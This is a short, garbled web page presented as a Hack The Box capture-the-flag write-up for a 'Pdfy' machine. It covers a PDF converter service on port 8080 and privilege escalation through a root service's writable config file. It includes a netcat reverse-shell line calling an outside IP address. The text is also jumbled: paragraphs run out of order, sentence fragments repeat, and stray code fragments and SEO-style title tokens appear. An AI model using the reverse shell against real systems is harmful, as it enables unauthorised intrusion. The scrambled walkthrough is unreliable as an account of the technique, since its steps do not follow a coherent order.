Pdfy Htb Writeup Upd 🔥

Next, we perform a system enumeration using tools like linpeas and systemd-analyze . The results reveal that the machine uses a SystemD service called pdfy-converter to manage the PDF converter service on port 8080.

Upon further examination, we find that the pdfy-converter service runs as the root user and uses a configuration file located at /etc/pdfy-converter/config.json . We also notice that the configuration file has weak permissions, allowing the pdfy user to modify its contents. pdfy htb writeup upd

# Establish a reverse shell os.system('nc 10.10.14.12 4444 -e /bin/bash') After executing the exploit, we gain a reverse shell as the user pdfy . We then proceed to explore the machine and gather more information about the user and its privileges. Next, we perform a system enumeration using tools

We then focus our attention on the PDF converter service running on port 8080. After analyzing the service using tools like curl and burpsuite , we discover that it allows users to convert various file formats to PDF. However, we also notice that the service does not perform any validation on user-input files, which could potentially lead to code execution vulnerabilities. We also notice that the configuration file has

import socket import os